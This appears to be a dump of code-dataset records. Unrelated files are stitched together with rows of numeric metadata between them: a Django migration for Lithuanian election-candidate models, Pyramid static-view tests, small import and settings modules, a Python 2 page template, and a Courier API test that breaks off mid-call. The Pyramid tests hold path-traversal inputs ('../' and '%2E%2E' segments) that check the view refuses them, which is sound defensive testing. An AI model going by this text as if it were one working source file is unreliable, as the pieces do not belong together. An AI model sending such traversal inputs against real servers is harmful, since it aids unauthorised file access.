                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('position', models.CharField(blank=True, max_length=100, verbose_name='Pareigos')),
                ('office', models.CharField(blank=True, max_length=100, verbose_name='Darbovietė')),
                ('start', models.DateField(blank=True, verbose_name='Pereigų pradžia')),
                ('end', models.DateField(blank=True, verbose_name='Pereigų pabaiga')),
                ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Sukurta')),
                ('updated_at', models.DateTimeField(auto_now=True, verbose_name='Atnaujinta')),
            ],
            options={
                'verbose_name': 'Darbo patirties įrašas',
                'verbose_name_plural': 'Darbo patirties įrašai',
                'ordering': ['created_at'],
            },
        ),
        # Political experience entries for presidential candidates
        # (note: start/end are also nullable here, unlike the EP models).
        migrations.CreateModel(
            name='PresidentCandidatePoliticalExperience',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('position', models.CharField(blank=True, max_length=100, verbose_name='Pareigos')),
                ('office', models.CharField(blank=True, max_length=100, verbose_name='Institucija')),
                ('start', models.DateField(blank=True, null=True, verbose_name='Pereigų pradžia')),
                ('end', models.DateField(blank=True, null=True, verbose_name='Pereigų pabaiga')),
                ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Sukurta')),
                ('updated_at', models.DateTimeField(auto_now=True, verbose_name='Atnaujinta')),
            ],
            options={
                'verbose_name': 'Politinė patirties įrašas',
                'verbose_name_plural': 'Politinės patirties įrašai',
                'ordering': ['created_at'],
            },
        ),
        # Work experience entries for presidential candidates.
        migrations.CreateModel(
            name='PresidentCandidateWorkExperience',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('position', models.CharField(blank=True, max_length=100, verbose_name='Pareigos')),
                ('office', models.CharField(blank=True, max_length=100, verbose_name='Darbovietė')),
                ('start', models.DateField(blank=True, null=True, verbose_name='Pereigų pradžia')),
                ('end', models.DateField(blank=True, null=True, verbose_name='Pereigų pabaiga')),
                ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Sukurta')),
                ('updated_at', models.DateTimeField(auto_now=True, verbose_name='Atnaujinta')),
            ],
            options={
                'verbose_name': 'Darbo patirties įrašas',
                'verbose_name_plural': 'Darbo patirties įrašai',
                'ordering': ['created_at'],
            },
        ),
        # New personal-detail fields on the existing candidate models.
        migrations.AddField(
            model_name='europarliamentcandidate',
            name='birth_date',
            field=models.DateField(blank=True, null=True, verbose_name='Gimimo data'),
        ),
        migrations.AddField(
            model_name='europarliamentcandidate',
            name='birth_place',
            field=models.CharField(blank=True, max_length=100, verbose_name='Gimimo vieta'),
        ),
        migrations.AddField(
            model_name='europarliamentcandidate',
            name='hobbies',
            field=models.CharField(blank=True, max_length=500, verbose_name='Pomėgiai'),
        ),
        migrations.AddField(
            model_name='europarliamentcandidate',
            name='languages',
            field=models.CharField(blank=True, max_length=300, verbose_name='Užsienio kalbos'),
        ),
        migrations.AddField(
            model_name='presidentcandidate',
            name='birth_date',
            field=models.DateField(blank=True, null=True, verbose_name='Gimimo data'),
        ),
        migrations.AddField(
            model_name='presidentcandidate',
            name='birth_place',
            field=models.CharField(blank=True, max_length=100, verbose_name='Gimimo vieta'),
        ),
        migrations.AddField(
            model_name='presidentcandidate',
            name='email',
            field=models.EmailField(blank=True, max_length=254, null=True, verbose_name='Kandidato el. paštas'),
        ),
        migrations.AddField(
            model_name='presidentcandidate',
            name='hobbies',
            field=models.CharField(blank=True, max_length=500, verbose_name='Pomėgiai'),
        ),
        migrations.AddField(
            model_name='presidentcandidate',
            name='languages',
            field=models.CharField(blank=True, max_length=300, verbose_name='Užsienio kalbos'),
        ),
        migrations.AlterField(
            model_name='presidentcandidate',
            name='party',
            field=models.CharField(blank=True, help_text='Jeigu kandidatas - be partijos, nurodykite, kad savarankiškas', max_length=280, verbose_name='Partija'),
        ),
        # ForeignKeys linking the new experience/biography tables to their
        # candidate records; CASCADE deletes rows with the candidate.
        migrations.AddField(
            model_name='presidentcandidateworkexperience',
            name='candidate',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='work_experience', to='elections.PresidentCandidate'),
        ),
        migrations.AddField(
            model_name='presidentcandidatepoliticalexperience',
            name='candidate',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='political_experience', to='elections.PresidentCandidate'),
        ),
        migrations.AddField(
            model_name='europarliamentcandidateworkexperience',
            name='candidate',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='work_experience', to='elections.EuroParliamentCandidate'),
        ),
        migrations.AddField(
            model_name='europarliamentcandidatepoliticalexperience',
            name='candidate',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='political_experience', to='elections.EuroParliamentCandidate'),
        ),
        migrations.AddField(
            model_name='europarliamentcandidatebiography',
            name='candidate',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='biographies', to='elections.EuroParliamentCandidate'),
        ),
    ]
| 51.34104
| 162
| 0.612362
| 815
| 8,882
| 6.487117
| 0.158282
| 0.11027
| 0.062417
| 0.072631
| 0.810857
| 0.805372
| 0.774352
| 0.743333
| 0.704558
| 0.704558
| 0
| 0.010515
| 0.261202
| 8,882
| 172
| 163
| 51.639535
| 0.795184
| 0.005066
| 0
| 0.771084
| 1
| 0
| 0.243237
| 0.072326
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012048
| 0
| 0.03012
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
94497d4f63eba902d06684a3f328f2d16600bf0b
| 15,384
|
py
|
Python
|
pyramid/tests/test_static.py
|
danielpronych/pyramid-doxygen
|
ad95a8c151c2c4e029e03aed2feda2993380f36f
|
[
"BSD-2-Clause"
] | null | null | null |
pyramid/tests/test_static.py
|
danielpronych/pyramid-doxygen
|
ad95a8c151c2c4e029e03aed2feda2993380f36f
|
[
"BSD-2-Clause"
] | null | null | null |
pyramid/tests/test_static.py
|
danielpronych/pyramid-doxygen
|
ad95a8c151c2c4e029e03aed2feda2993380f36f
|
[
"BSD-2-Clause"
] | null | null | null |
import datetime
import unittest
# A timestamp roughly five years in the future (365-day years, so "more
# or less"); used by the tests below as a far-future reference time.
fiveyrsfuture = datetime.datetime.utcnow() + datetime.timedelta(days=365 * 5)
class Test_static_view_use_subpath_False(unittest.TestCase):
def _getTargetClass(self):
from pyramid.static import static_view
return static_view
def _makeOne(self, *arg, **kw):
return self._getTargetClass()(*arg, **kw)
def _makeRequest(self, kw=None):
from pyramid.request import Request
environ = {
'wsgi.url_scheme':'http',
'wsgi.version':(1,0),
'SERVER_NAME':'example.com',
'SERVER_PORT':'6543',
'PATH_INFO':'/',
'SCRIPT_NAME':'',
'REQUEST_METHOD':'GET',
}
if kw is not None:
environ.update(kw)
return Request(environ=environ)
def test_ctor_defaultargs(self):
inst = self._makeOne('package:resource_name')
self.assertEqual(inst.package_name, 'package')
self.assertEqual(inst.docroot, 'resource_name')
self.assertEqual(inst.cache_max_age, 3600)
self.assertEqual(inst.index, 'index.html')
def test_call_adds_slash_path_info_empty(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest({'PATH_INFO':''})
context = DummyContext()
from pyramid.httpexceptions import HTTPMovedPermanently
self.assertRaises(HTTPMovedPermanently, inst, context, request)
def test_path_info_slash_means_index_html(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest()
context = DummyContext()
response = inst(context, request)
self.assertTrue(b'<html>static</html>' in response.body)
def test_oob_singledot(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest({'PATH_INFO':'/./index.html'})
context = DummyContext()
response = inst(context, request)
self.assertEqual(response.status, '200 OK')
self.assertTrue(b'<html>static</html>' in response.body)
def test_oob_emptyelement(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest({'PATH_INFO':'//index.html'})
context = DummyContext()
response = inst(context, request)
self.assertEqual(response.status, '200 OK')
self.assertTrue(b'<html>static</html>' in response.body)
def test_oob_dotdotslash(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest({'PATH_INFO':'/subdir/../../minimal.pt'})
context = DummyContext()
from pyramid.httpexceptions import HTTPNotFound
self.assertRaises(HTTPNotFound, inst, context, request)
def test_oob_dotdotslash_encoded(self):
    """URL-encoded '..' traversal attempts are rejected with 404."""
    from pyramid.httpexceptions import HTTPNotFound
    view = self._makeOne('pyramid.tests:fixtures/static')
    req = self._makeRequest(
        {'PATH_INFO': '/subdir/%2E%2E%2F%2E%2E/minimal.pt'})
    self.assertRaises(HTTPNotFound, view, DummyContext(), req)
def test_oob_os_sep(self):
    """Traversal using the platform path separator is rejected with 404."""
    import os
    from pyramid.httpexceptions import HTTPNotFound
    view = self._makeOne('pyramid.tests:fixtures/static')
    dds = '..' + os.sep
    req = self._makeRequest({'PATH_INFO': '/subdir/%s%sminimal.pt' %
                             (dds, dds)})
    self.assertRaises(HTTPNotFound, view, DummyContext(), req)
def test_resource_doesnt_exist(self):
    """A path that matches no file in the docroot yields 404."""
    from pyramid.httpexceptions import HTTPNotFound
    view = self._makeOne('pyramid.tests:fixtures/static')
    req = self._makeRequest({'PATH_INFO': '/notthere'})
    self.assertRaises(HTTPNotFound, view, DummyContext(), req)
def test_resource_isdir(self):
    """A directory path serves that directory's index file."""
    view = self._makeOne('pyramid.tests:fixtures/static')
    req = self._makeRequest({'PATH_INFO': '/subdir/'})
    resp = view(DummyContext(), req)
    self.assertTrue(b'<html>subdir</html>' in resp.body)
def test_resource_is_file(self):
    """A plain file path serves the file's contents."""
    view = self._makeOne('pyramid.tests:fixtures/static')
    req = self._makeRequest({'PATH_INFO': '/index.html'})
    resp = view(DummyContext(), req)
    self.assertTrue(b'<html>static</html>' in resp.body)
def test_resource_is_file_with_wsgi_file_wrapper(self):
    """When the environ offers wsgi.file_wrapper, the response uses it."""
    from pyramid.response import _BLOCK_SIZE
    view = self._makeOne('pyramid.tests:fixtures/static')
    req = self._makeRequest({'PATH_INFO': '/index.html'})

    class _Wrapper(object):
        # Minimal stand-in recording the wrapped file and block size.
        def __init__(self, file, block_size=None):
            self.file = file
            self.block_size = block_size

    req.environ['wsgi.file_wrapper'] = _Wrapper
    resp = view(DummyContext(), req)
    body_iter = resp.app_iter
    self.assertTrue(isinstance(body_iter, _Wrapper))
    self.assertTrue(b'<html>static</html>' in body_iter.file.read())
    self.assertEqual(body_iter.block_size, _BLOCK_SIZE)
    body_iter.file.close()
def test_resource_is_file_with_cache_max_age(self):
    """cache_max_age adds Cache-Control and Expires to the headers."""
    view = self._makeOne('pyramid.tests:fixtures/static', cache_max_age=600)
    req = self._makeRequest({'PATH_INFO': '/index.html'})
    resp = view(DummyContext(), req)
    self.assertTrue(b'<html>static</html>' in resp.body)
    self.assertEqual(len(resp.headerlist), 5)
    names = sorted(pair[0] for pair in resp.headerlist)
    self.assertEqual(names,
                     ['Cache-Control', 'Content-Length', 'Content-Type',
                      'Expires', 'Last-Modified'])
def test_resource_is_file_with_no_cache_max_age(self):
    """With cache_max_age=None no caching headers are emitted."""
    view = self._makeOne('pyramid.tests:fixtures/static',
                         cache_max_age=None)
    req = self._makeRequest({'PATH_INFO': '/index.html'})
    resp = view(DummyContext(), req)
    self.assertTrue(b'<html>static</html>' in resp.body)
    self.assertEqual(len(resp.headerlist), 3)
    names = sorted(pair[0] for pair in resp.headerlist)
    self.assertEqual(
        names,
        ['Content-Length', 'Content-Type', 'Last-Modified'])
def test_resource_notmodified(self):
    """A future If-Modified-Since yields 304 with an empty body."""
    view = self._makeOne('pyramid.tests:fixtures/static')
    req = self._makeRequest({'PATH_INFO': '/index.html'})
    req.if_modified_since = fiveyrsfuture
    resp = view(DummyContext(), req)
    start_response = DummyStartResponse()
    body_iter = resp(req.environ, start_response)
    try:
        self.assertEqual(start_response.status, '304 Not Modified')
        self.assertEqual(list(body_iter), [])
    finally:
        body_iter.close()
def test_not_found(self):
    """A missing .html file yields 404."""
    from pyramid.httpexceptions import HTTPNotFound
    view = self._makeOne('pyramid.tests:fixtures/static')
    req = self._makeRequest({'PATH_INFO': '/notthere.html'})
    self.assertRaises(HTTPNotFound, view, DummyContext(), req)
def test_resource_with_content_encoding(self):
    """A .tgz file is served as application/x-tar with gzip encoding."""
    view = self._makeOne('pyramid.tests:fixtures/static')
    req = self._makeRequest({'PATH_INFO': '/arcs.svg.tgz'})
    resp = view(DummyContext(), req)
    self.assertEqual(resp.status, '200 OK')
    self.assertEqual(resp.content_type, 'application/x-tar')
    self.assertEqual(resp.content_encoding, 'gzip')
    resp.app_iter.close()
def test_resource_no_content_encoding(self):
    """A plain .html file has no Content-Encoding."""
    view = self._makeOne('pyramid.tests:fixtures/static')
    req = self._makeRequest({'PATH_INFO': '/index.html'})
    resp = view(DummyContext(), req)
    self.assertEqual(resp.status, '200 OK')
    self.assertEqual(resp.content_type, 'text/html')
    self.assertEqual(resp.content_encoding, None)
    resp.app_iter.close()
class Test_static_view_use_subpath_True(unittest.TestCase):
    """Tests for ``pyramid.static.static_view`` with ``use_subpath=True``.

    In this mode the view resolves the file to serve from
    ``request.subpath`` (a tuple of path segments) instead of PATH_INFO.
    """

    def _getTargetClass(self):
        # System under test.
        from pyramid.static import static_view
        return static_view

    def _makeOne(self, *arg, **kw):
        # Force subpath-based resolution for every instance built here.
        kw['use_subpath'] = True
        return self._getTargetClass()(*arg, **kw)

    def _makeRequest(self, kw=None):
        """Build a minimal GET request; ``kw`` overrides environ keys."""
        from pyramid.request import Request
        environ = {
            'wsgi.url_scheme': 'http',
            'wsgi.version': (1, 0),
            'SERVER_NAME': 'example.com',
            'SERVER_PORT': '6543',
            'PATH_INFO': '/',
            'SCRIPT_NAME': '',
            'REQUEST_METHOD': 'GET',
        }
        if kw is not None:
            environ.update(kw)
        return Request(environ=environ)

    def test_ctor_defaultargs(self):
        """Defaults: package/docroot parsed from spec, 3600s cache, index.html."""
        inst = self._makeOne('package:resource_name')
        self.assertEqual(inst.package_name, 'package')
        self.assertEqual(inst.docroot, 'resource_name')
        self.assertEqual(inst.cache_max_age, 3600)
        self.assertEqual(inst.index, 'index.html')

    def test_call_adds_slash_path_info_empty(self):
        """Empty PATH_INFO triggers a permanent redirect appending a slash."""
        inst = self._makeOne('pyramid.tests:fixtures/static')
        request = self._makeRequest({'PATH_INFO': ''})
        request.subpath = ()
        context = DummyContext()
        from pyramid.httpexceptions import HTTPMovedPermanently
        self.assertRaises(HTTPMovedPermanently, inst, context, request)

    def test_path_info_slash_means_index_html(self):
        """An empty subpath serves the configured index file."""
        inst = self._makeOne('pyramid.tests:fixtures/static')
        request = self._makeRequest()
        request.subpath = ()
        context = DummyContext()
        response = inst(context, request)
        self.assertTrue(b'<html>static</html>' in response.body)

    def test_oob_singledot(self):
        """A '.' subpath segment is rejected with 404 (no normalization)."""
        inst = self._makeOne('pyramid.tests:fixtures/static')
        request = self._makeRequest()
        request.subpath = ('.', 'index.html')
        context = DummyContext()
        from pyramid.httpexceptions import HTTPNotFound
        self.assertRaises(HTTPNotFound, inst, context, request)

    def test_oob_emptyelement(self):
        """An empty subpath segment is rejected with 404."""
        inst = self._makeOne('pyramid.tests:fixtures/static')
        request = self._makeRequest()
        request.subpath = ('', 'index.html')
        context = DummyContext()
        from pyramid.httpexceptions import HTTPNotFound
        self.assertRaises(HTTPNotFound, inst, context, request)

    def test_oob_dotdotslash(self):
        """Directory traversal via '..' segments is rejected with 404."""
        inst = self._makeOne('pyramid.tests:fixtures/static')
        request = self._makeRequest()
        request.subpath = ('subdir', '..', '..', 'minimal.pt')
        context = DummyContext()
        from pyramid.httpexceptions import HTTPNotFound
        self.assertRaises(HTTPNotFound, inst, context, request)

    def test_oob_dotdotslash_encoded(self):
        """URL-encoded '..' traversal segments are rejected with 404."""
        inst = self._makeOne('pyramid.tests:fixtures/static')
        request = self._makeRequest()
        request.subpath = ('subdir', '%2E%2E', '%2E%2E', 'minimal.pt')
        context = DummyContext()
        from pyramid.httpexceptions import HTTPNotFound
        self.assertRaises(HTTPNotFound, inst, context, request)

    def test_oob_os_sep(self):
        """Traversal using the platform path separator is rejected with 404."""
        import os
        inst = self._makeOne('pyramid.tests:fixtures/static')
        dds = '..' + os.sep
        request = self._makeRequest()
        request.subpath = ('subdir', dds, dds, 'minimal.pt')
        context = DummyContext()
        from pyramid.httpexceptions import HTTPNotFound
        self.assertRaises(HTTPNotFound, inst, context, request)

    def test_resource_doesnt_exist(self):
        """An unknown subpath yields 404."""
        inst = self._makeOne('pyramid.tests:fixtures/static')
        request = self._makeRequest()
        # BUG FIX: was ('notthere,') -- a plain string (comma inside the
        # quotes), not the intended one-element tuple.
        request.subpath = ('notthere',)
        context = DummyContext()
        from pyramid.httpexceptions import HTTPNotFound
        self.assertRaises(HTTPNotFound, inst, context, request)

    def test_resource_isdir(self):
        """A directory subpath serves that directory's index file."""
        inst = self._makeOne('pyramid.tests:fixtures/static')
        request = self._makeRequest()
        request.subpath = ('subdir',)
        context = DummyContext()
        response = inst(context, request)
        self.assertTrue(b'<html>subdir</html>' in response.body)

    def test_resource_is_file(self):
        """A plain file subpath serves the file's contents."""
        inst = self._makeOne('pyramid.tests:fixtures/static')
        request = self._makeRequest()
        request.subpath = ('index.html',)
        context = DummyContext()
        response = inst(context, request)
        self.assertTrue(b'<html>static</html>' in response.body)

    def test_resource_is_file_with_cache_max_age(self):
        """cache_max_age adds Cache-Control and Expires to the headers."""
        inst = self._makeOne('pyramid.tests:fixtures/static', cache_max_age=600)
        request = self._makeRequest()
        request.subpath = ('index.html',)
        context = DummyContext()
        response = inst(context, request)
        self.assertTrue(b'<html>static</html>' in response.body)
        self.assertEqual(len(response.headerlist), 5)
        header_names = [x[0] for x in response.headerlist]
        header_names.sort()
        self.assertEqual(header_names,
                         ['Cache-Control', 'Content-Length', 'Content-Type',
                          'Expires', 'Last-Modified'])

    def test_resource_is_file_with_no_cache_max_age(self):
        """With cache_max_age=None no caching headers are emitted."""
        inst = self._makeOne('pyramid.tests:fixtures/static',
                             cache_max_age=None)
        request = self._makeRequest()
        request.subpath = ('index.html',)
        context = DummyContext()
        response = inst(context, request)
        self.assertTrue(b'<html>static</html>' in response.body)
        self.assertEqual(len(response.headerlist), 3)
        header_names = [x[0] for x in response.headerlist]
        header_names.sort()
        self.assertEqual(
            header_names,
            ['Content-Length', 'Content-Type', 'Last-Modified'])

    def test_resource_notmodified(self):
        """A future If-Modified-Since yields 304 with an empty body."""
        inst = self._makeOne('pyramid.tests:fixtures/static')
        request = self._makeRequest()
        request.if_modified_since = fiveyrsfuture
        request.subpath = ('index.html',)
        context = DummyContext()
        response = inst(context, request)
        start_response = DummyStartResponse()
        app_iter = response(request.environ, start_response)
        try:
            self.assertEqual(start_response.status, '304 Not Modified')
            self.assertEqual(list(app_iter), [])
        finally:
            app_iter.close()

    def test_not_found(self):
        """A missing .html subpath yields 404."""
        inst = self._makeOne('pyramid.tests:fixtures/static')
        request = self._makeRequest()
        request.subpath = ('notthere.html',)
        context = DummyContext()
        from pyramid.httpexceptions import HTTPNotFound
        self.assertRaises(HTTPNotFound, inst, context, request)
class DummyContext:
    """Inert placeholder for the traversal-context argument of a view."""
class DummyStartResponse:
    """Capture the (status, headers) a WSGI app passes to start_response."""

    # Class-level sentinels so un-called instances expose empty tuples.
    status = ()
    headers = ()

    def __call__(self, status, headers):
        # Record the WSGI start_response arguments on the instance.
        self.status, self.headers = status, headers
| 41.354839
| 80
| 0.642421
| 1,643
| 15,384
| 5.823494
| 0.096166
| 0.051735
| 0.051735
| 0.071279
| 0.929243
| 0.91273
| 0.898411
| 0.895171
| 0.895171
| 0.895171
| 0
| 0.005637
| 0.23895
| 15,384
| 371
| 81
| 41.466307
| 0.811582
| 0.002015
| 0
| 0.838415
| 0
| 0
| 0.149502
| 0.06651
| 0
| 0
| 0
| 0
| 0.17378
| 1
| 0.125
| false
| 0.003049
| 0.070122
| 0.003049
| 0.234756
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
849f6a751659bc40bf1e15374c00140755cbbbe3
| 160
|
py
|
Python
|
src/clusto/drivers/devices/common/__init__.py
|
rongoro/clusto
|
d6425433e5132e8778feeb9db4b8dd80b933b030
|
[
"BSD-3-Clause"
] | 5
|
2015-07-19T08:28:01.000Z
|
2021-07-08T14:49:27.000Z
|
src/clusto/drivers/devices/common/__init__.py
|
wt/clusto
|
c114ce7c42dcfa33c1e79f4d3b49313115fea06b
|
[
"BSD-3-Clause"
] | null | null | null |
src/clusto/drivers/devices/common/__init__.py
|
wt/clusto
|
c114ce7c42dcfa33c1e79f4d3b49313115fea06b
|
[
"BSD-3-Clause"
] | 5
|
2015-01-06T07:57:07.000Z
|
2021-11-10T18:01:33.000Z
|
from clusto.drivers.devices.common.portmixin import *
from clusto.drivers.devices.common.ipmixin import *
from clusto.drivers.devices.common.snmpmixin import *
| 40
| 53
| 0.83125
| 21
| 160
| 6.333333
| 0.428571
| 0.225564
| 0.383459
| 0.541353
| 0.766917
| 0.541353
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075
| 160
| 3
| 54
| 53.333333
| 0.898649
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
84a6ec319fa7480411842e596ccfaee58c75c889
| 177
|
py
|
Python
|
{{ cookiecutter.project_slug }}/src/{{ cookiecutter.project_slug }}/settings/__init__.py
|
moorinteractive/coockiecutter-django
|
9c712b2b87459cc3acbfce320f0414da20327761
|
[
"MIT"
] | null | null | null |
{{ cookiecutter.project_slug }}/src/{{ cookiecutter.project_slug }}/settings/__init__.py
|
moorinteractive/coockiecutter-django
|
9c712b2b87459cc3acbfce320f0414da20327761
|
[
"MIT"
] | null | null | null |
{{ cookiecutter.project_slug }}/src/{{ cookiecutter.project_slug }}/settings/__init__.py
|
moorinteractive/coockiecutter-django
|
9c712b2b87459cc3acbfce320f0414da20327761
|
[
"MIT"
] | null | null | null |
# Settings package entry point (cookiecutter template): always load the base
# settings, then allow an optional, typically untracked ``local`` module to
# override them per developer/machine.
from {{ cookiecutter.project_slug }}.settings.base import *  # noqa
try:
    from {{ cookiecutter.project_slug }}.settings.local import *  # noqa
except ImportError:
    # ``local.py`` is optional; silently fall back to base settings.
    pass
| 22.125
| 72
| 0.706215
| 20
| 177
| 6.15
| 0.65
| 0.260163
| 0.373984
| 0.439024
| 0.569106
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.180791
| 177
| 7
| 73
| 25.285714
| 0.848276
| 0.050847
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.2
| 0.6
| null | null | 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
|
0
| 8
|
ca4f40c9d5f8661cb0a9d0507a89e3e303997f69
| 3,189
|
py
|
Python
|
user/vistas/templates/administrativo.py
|
ZerpaTechnology/occoa
|
a8c0bd2657bc058801a883109c0ec0d608d04ccc
|
[
"Apache-2.0"
] | null | null | null |
user/vistas/templates/administrativo.py
|
ZerpaTechnology/occoa
|
a8c0bd2657bc058801a883109c0ec0d608d04ccc
|
[
"Apache-2.0"
] | null | null | null |
user/vistas/templates/administrativo.py
|
ZerpaTechnology/occoa
|
a8c0bd2657bc058801a883109c0ec0d608d04ccc
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Page template for the "administrativo" view (Python 2 syntax: note the
# ``except Exception, e`` form). NOTE(review): ``doc``, ``data`` and
# ``incluir`` are not defined here -- presumably injected by the template
# engine that executes this file; confirm against the framework.
doc+='''<!DOCTYPE html>
<html>
'''
# Page title consumed by the "head" partial below.
data["titulo"]="Unexpo núcleo Charallave"
doc+='''
'''
# Partials are included best-effort: on failure the error text itself is
# rendered into the page instead of aborting.
try: doc+=str(incluir(data,"head"))
except Exception, e: doc+=str(e)
doc+='''
<body class="" >
'''
try: doc+=str(incluir(data,"widget-navbar"))
except Exception, e: doc+=str(e)
doc+='''
<div class="container-fluid">
'''
# Disabled include kept for reference.
#=incluir(data,"barra-buscador")
doc+='''
<div class="row bg-porcelain height-50">
<div class="col-md-4 height-5 pad-2">
<h1>DACE</h1>
</div>
<div class="col-md-2 height-5">
<a href="" class="d-block decoration-none marg-05"><div class="pad-1 bg-ubuntu_blue white decoration-none">Descargar constancia de estudios</div></a>
<a href="" class="d-block decoration-none marg-05"><div class="pad-1 bg-ubuntu_blue white decoration-none">Descargar record Academico</div></a>
<a href="" class="d-block decoration-none marg-05"><div class="pad-1 bg-ubuntu_blue white decoration-none">Descargar requisitos de inscripción</div></a>
<a href="" class="d-block decoration-none marg-05"><div class="pad-1 bg-ubuntu_blue white decoration-none">Carreras</div></a>
<a href="" class="d-block decoration-none marg-05"><div class="pad-1 bg-ubuntu_blue white decoration-none">Especializaciones</div></a>
</div>
<div class="col-md-6 height-5 pad-1 bg-ubuntu_porcelain font-ubuntu">
<p>
Unidad del nucleo charallave encarada de gestionar las inscripicones y administracion de notas de nuestro alumnado
</p>
</div>
</div>
<hr>
<div class="row bg-porcelain height-50">
<div class="col-md-4 height-5 pad-2">
<h1>DOBE</h1>
</div>
<div class="col-md-2 height-5">
<a href="" class="d-block decoration-none marg-05"><div class="pad-1 bg-ubuntu_blue white decoration-none">Solicitar beca trabajo</div></a>
<a href="" class="d-block decoration-none marg-05"><div class="pad-1 bg-ubuntu_blue white decoration-none">Descargar record Academico</div></a>
<a href="" class="d-block decoration-none marg-05"><div class="pad-1 bg-ubuntu_blue white decoration-none">Descargar requisitos de inscripción</div></a>
</div>
<div class="col-md-6 height-5 pad-1 bg-ubuntu_porcelain font-ubuntu">
<p>
Unidad del nucleo charallave encarada de gestionar las inscripicones y administracion de notas de nuestro alumnado
</p>
</div>
</div>
<hr>
<div class="row bg-porcelain height-50">
<div class="col-md-4 height-5 pad-2">
<h1>DIRECCIÓN</h1>
</div>
<div class="col-md-2 height-5">
<a href="" class="d-block decoration-none marg-05"><div class="pad-1 bg-ubuntu_blue white decoration-none">Enviar carta</div></a>
<a href="" class="d-block decoration-none marg-05"><div class="pad-1 bg-ubuntu_blue white decoration-none">Descargar record Academico</div></a>
<a href="" class="d-block decoration-none marg-05"><div class="pad-1 bg-ubuntu_blue white decoration-none">Descargar requisitos de inscripción</div></a>
</div>
<div class="col-md-6 height-5 pad-1 bg-ubuntu_porcelain font-ubuntu">
<p>
Unidad del nucleo charallave encarada de gestionar las inscripicones y administracion de notas de nuestro alumnado
</p>
</div>
</div>
'''
try: doc+=str(incluir(data,"footer"))
except Exception, e: doc+=str(e)
doc+='''
<div class="row">
</div>
</div>
</body>
</html>'''
| 38.421687
| 153
| 0.706805
| 525
| 3,189
| 4.266667
| 0.169524
| 0.089286
| 0.0375
| 0.075
| 0.885268
| 0.858482
| 0.858482
| 0.846875
| 0.846875
| 0.816518
| 0
| 0.02445
| 0.102226
| 3,189
| 83
| 154
| 38.421687
| 0.757946
| 0.021637
| 0
| 0.746667
| 0
| 0.186667
| 0.909557
| 0.127325
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ca9af783aae4319783690b6816af069b3f01dca0
| 3,083
|
py
|
Python
|
tests/test_automations.py
|
andrewmilas10/courier-python
|
d0935bcef2dfc67324794b2ba320a69256131422
|
[
"MIT"
] | 13
|
2020-07-29T22:05:36.000Z
|
2021-08-10T14:32:50.000Z
|
tests/test_automations.py
|
andrewmilas10/courier-python
|
d0935bcef2dfc67324794b2ba320a69256131422
|
[
"MIT"
] | 18
|
2020-03-19T20:04:45.000Z
|
2022-03-31T23:32:11.000Z
|
tests/test_automations.py
|
andrewmilas10/courier-python
|
d0935bcef2dfc67324794b2ba320a69256131422
|
[
"MIT"
] | 8
|
2020-05-15T15:30:29.000Z
|
2022-02-08T14:10:48.000Z
|
import json
import responses
import pytest
from os import environ
from trycourier.client import Courier
from trycourier.exceptions import CourierAPIException
@responses.activate
def test_success_invoke():
    """invoke() POSTs every field and returns the decoded JSON body."""
    responses.add(
        responses.POST,
        'https://api.courier.com/automations/invoke',
        status=200,
